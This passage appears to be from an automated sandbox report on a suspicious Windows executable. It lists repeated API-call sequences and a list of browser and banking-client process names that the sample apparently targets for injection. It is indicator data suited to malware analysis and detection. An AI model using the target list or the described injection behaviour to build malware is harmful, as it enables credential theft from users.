dleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_013F1900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013E3610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013E3610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013E3610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_015278A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_015278A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_015278A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 